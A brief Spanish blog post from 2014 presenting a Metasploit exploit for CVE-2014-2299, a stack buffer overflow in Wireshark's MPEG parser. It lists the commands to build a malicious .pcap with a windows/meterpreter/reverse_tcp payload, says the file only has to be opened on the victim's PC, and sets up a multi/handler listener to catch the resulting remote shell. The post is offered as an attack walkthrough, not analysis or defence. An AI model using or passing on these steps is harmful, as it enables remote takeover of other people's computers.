Publicado Por
Unknown
//
11:44
//
10 jun 2014
Este módulo Metasploit provoca un desbordamiento del búfer de pila en las versiones de Wireshark 1.8.12-1.10.5 y por abajo por la generación de un archivo malicioso.
Desbordamiento de búfer en la función mpeg_read en escuchas telefónicas / mpeg.c en el analizador MPEG en Wireshark 1.8.x antes de 1.8.13 y 1.10.x antes 1.10.6 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (caída de aplicación) a través de un gran récord en los datos MPEG.
Exploit
Cita:CVE-2014-2299
Cita:kali linux
Metasploit
Cita:set payload windows/meterpreter/reverse_tcp
set lhost (IP)set target 1exploit
el archivo ,solo hay que abrirlo en la pc victima.
Pero antes hay que crear una conexion de handler para que cuando abramos el archivo (.pcap) se conecte a la pc atacante,configuramos nuestros parametros.
Cita:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcpset lhost 192.168.154.130exploit
Esperamos que conecte y nos da la sesión de meterpreter.
0 comentarios: